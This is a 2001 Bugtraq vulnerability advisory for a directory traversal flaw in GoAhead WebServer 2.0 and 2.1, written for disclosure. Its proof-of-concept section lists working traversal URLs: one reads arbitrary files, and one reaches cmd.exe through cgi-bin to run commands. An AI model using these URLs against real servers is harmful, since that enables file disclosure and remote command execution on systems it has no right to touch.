BID:2334

GoAhead WebServer Directory Traversal Vulnerability

Info

GoAhead WebServer Directory Traversal Vulnerability

Bugtraq ID:	2334
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Feb 02 2001 12:00AM
Updated:	Feb 02 2001 12:00AM
Credit:	Discovered and posted to Bugtraq on Feb 2, 2001 by Sergey Nenashev <[email protected]>.
Vulnerable:	GoAhead Software GoAhead WebServer 2.1 - Linux kernel 2.3 - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows CE 3.0 - Microsoft Windows CE 2.0 - Microsoft Windows NT 4.0 GoAhead Software GoAhead WebServer 2.0 - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows CE 3.0 - Microsoft Windows CE 2.0 - Microsoft Windows NT 4.0

Not Vulnerable:

Discussion

GoAhead WebServer Directory Traversal Vulnerability

A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges.

Exploit / POC

GoAhead WebServer Directory Traversal Vulnerability

The following examples have been provided by Sergey Nenashev <[email protected]>:

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\

Solution / Fix

GoAhead WebServer Directory Traversal Vulnerability

Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

GoAhead WebServer Directory Traversal Vulnerability

References:

GoAhead WebServer Product Homepage (GoAhead Software)